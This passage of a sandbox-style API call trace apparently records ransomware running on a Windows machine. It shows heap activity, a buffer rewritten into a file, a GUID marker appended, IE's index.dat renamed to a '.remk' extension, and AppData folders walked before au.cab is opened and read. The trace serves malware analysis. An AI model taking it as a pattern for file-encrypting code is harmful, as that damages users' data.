(HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0237.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca38 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9d8 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf258 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.137] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x7ffb, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x7ffb, lpOverlapped=0x0) returned 1 [0237.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.137] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.137] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.138] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.138] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.138] CloseHandle (hObject=0x640) returned 1 [0237.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c79a0 [0237.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0237.143] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.remk")) returned 1 [0237.145] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UV0DUWVB", cAlternateFileName="")) returned 1 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c79a0 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7a68 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b68b8 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7b30 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7bf8 [0237.145] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 1 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c79a0 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7a68 [0237.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0237.145] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 0 [0237.145] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.146] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185fa8 [0237.146] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0237.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0237.147] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf258 [0237.147] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.147] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.147] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.147] PathFindFileNameW (pszPath="") returned="" [0237.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0237.147] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.151] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.151] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0237.151] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.151] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.151] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0237.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0237.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0237.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf258 [0237.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0237.152] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.152] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.153] PathFindFileNameW (pszPath="") returned="" [0237.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0237.153] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8e062, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.cab", cAlternateFileName="")) returned 1 [0237.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0237.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c79a0 [0237.154] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0237.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.155] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=581730) returned 1 [0237.155] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.158] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.158] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.160] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x25805, 